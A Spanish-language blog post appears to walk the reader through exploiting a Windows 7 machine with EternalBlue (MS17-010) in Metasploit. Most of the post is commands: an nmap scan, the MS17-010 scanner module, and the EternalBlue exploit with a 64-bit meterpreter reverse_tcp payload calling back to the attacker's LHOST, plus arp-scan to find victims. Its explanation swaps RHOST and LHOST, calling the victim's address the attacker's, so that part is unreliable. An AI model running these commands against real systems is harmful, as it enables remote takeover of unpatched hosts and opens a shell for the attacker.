Hace un par de meses este exploit a sido publico en el cual he escrito sobre ese tema pero ahora que kali linux a actualizado su base de dato de exploit y a confirmado meter ese exploit en msfconsole.

Antes de empezar quisiera que leas sobre el articulo anterior. Aquí.

Antes no quería hacer publico esto porque aun no entendía quien era el creador real porque siempre había personas modificando el código y compartiéndolo. Entonces hoy te lo voy a mostrar en la base de datos de KALI LINUX.

Creo que si este exploit hubiera aparecido antes me hubiera sido útil para mi examen de OFFSEC.
Te daré un ejemplo tenemos un servidor web con ningún directorio o supuestamente ninguna vulnerabilidad.

Analizamos el servidor con NMAP y me sorprendo que es un windows 7 entonces busque el exploit que es básico para ese servidor y lo hice un escaneo.

nmap -sV -sC 192.168.1.X

Metasploit

msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
show options

Comprobamos sobre meter el contenido ejemplo un RHOSTS.

set RHOSTS 192.168.1.x
run


Ahora esté es el problema al hacer todo eso menos nmap, lo que harás es que el servidor te bloque ni hacer otro nmap. Entonces vamos a reiniciar la red.

/etc/init.d/network-manager restart

Como ya tenia información que era vulnerable entonces decidí explotarlo.

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.x
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.3
exploit

Ha ver para explicarte de donde conseguí todo ese comando, tiene que usar

search smb

Encontrarás el exploit o sino

search eternalblue

Luego indicamos que RHOST es la IP de mi maquina y usamos un payload con la arquitectura de 64bits y LHOST es la IP de la víctima en la misma red para sacarla usa

arp-scan -l

Y lo ejecutamos.

Ahora pregunta para 32bits? Bueno si te gusto puede ser que me anime en compartirlo.
No te olvides en compartirlo y darle mucho amor. GRACIAS

Share Please!